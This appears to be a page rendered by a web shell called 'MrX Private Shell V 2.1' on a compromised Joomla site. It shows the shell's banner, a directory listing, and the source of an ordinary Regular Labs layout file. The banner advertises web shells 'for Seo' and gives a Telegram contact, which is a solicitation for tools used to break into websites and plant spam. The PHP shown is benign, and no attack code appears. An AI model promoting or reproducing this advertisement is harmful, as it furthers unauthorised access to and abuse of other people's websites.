__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * @package Regular Labs Extension Manager * @version 9.1.0 * * @author Peter van Westen <[email protected]> * @link https://regularlabs.com * @copyright Copyright © 2025 Regular Labs All Rights Reserved * @license GNU General Public License version 2 or later */ defined('_JEXEC') or die; extract($displayData); /** * @var object $types * @var boolean $add_links */ $add_links ??= true; ?> <?php foreach ($types as $type) : ?> <?php if ($type->type == 'pkg') { continue; } ?> <?php if ($add_links && $type->url) : ?> <a href="<?php echo $type->url; ?>" target="_blank" class="rl-no-styling" title="<?php echo $type->text; ?>"> <?php endif; ?> <span class="d-xxl-none badge bg-<?php echo $type->class; ?> rl-badge rl-min-w-2em" title="<?php echo $type->text; ?>"> <?php echo $type->letter; ?> </span> <span class="d-none d-xxl-inline-block badge bg-<?php echo $type->class; ?> rl-badge mb-1"> <?php echo $type->text; ?> </span> <?php if ($add_links) : ?> </a> <?php endif; ?> <?php endforeach; ?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| button | Folder | 0775 |
|
|
| card | Folder | 0775 |
|
|
| table | Folder | 0775 |
|
|
| alerts.php | File | 2.18 KB | 0664 |
|
| button.php | File | 1.04 KB | 0664 |
|
| head_actions.php | File | 476 B | 0664 |
|
| head_name.php | File | 707 B | 0664 |
|
| link.php | File | 1.04 KB | 0664 |
|
| name.php | File | 449 B | 0664 |
|
| progress.php | File | 740 B | 0664 |
|
| row_name.php | File | 922 B | 0664 |
|
| types.php | File | 1.15 KB | 0664 |
|
| version.php | File | 1.41 KB | 0664 |
|